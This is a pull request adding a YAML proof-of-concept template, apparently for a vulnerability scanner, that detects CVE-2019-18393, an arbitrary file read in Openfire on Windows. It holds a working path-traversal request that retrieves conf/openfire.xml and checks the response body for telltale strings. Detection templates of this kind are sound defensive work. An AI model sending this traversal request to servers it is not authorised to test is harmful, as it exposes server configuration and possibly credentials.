### PR TITLE
Create openfire-win-lfi-cve-2019-18393.yml

### DIFF
--- a/pocs/openfire-win-lfi-cve-2019-18393.yml
+++ b/pocs/openfire-win-lfi-cve-2019-18393.yml
@@ -1,0 +1,14 @@
+name: poc-yaml-openfire-win-lfi-cve-2019-18393
+rules:
+  - method: GET
+    path: /plugins/search/..\..\..\conf\openfire.xml
+    follow_redirects: false
+    expression: >
+      response.status == 200 &&
+      response.body.bcontains(bytes("org.jivesoftware.database.EmbeddedConnectionProvider"))
+      && response.body.bcontains(bytes("Most properties are stored in the
+      Openfire database"))
+detail:
+  author: su(https://suzzz112113.github.io/#blog)
+  links:
+    - https://www.seebug.org/vuldb/ssvid-98329


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
   Openfire（以前称为Wildfire和Jive Messenger）是一个即時通訊（IM）和群聊服务器，它使用Java编写的XMPP服务器。在Openfire 4.3.3之前的版本存在一个任意文件读取漏洞。该poc就是检测这个漏洞。

## 测试环境
    暂无。
## 备注
  1、只在win环境有用。
  2、https://github.com/igniterealtime/Openfire
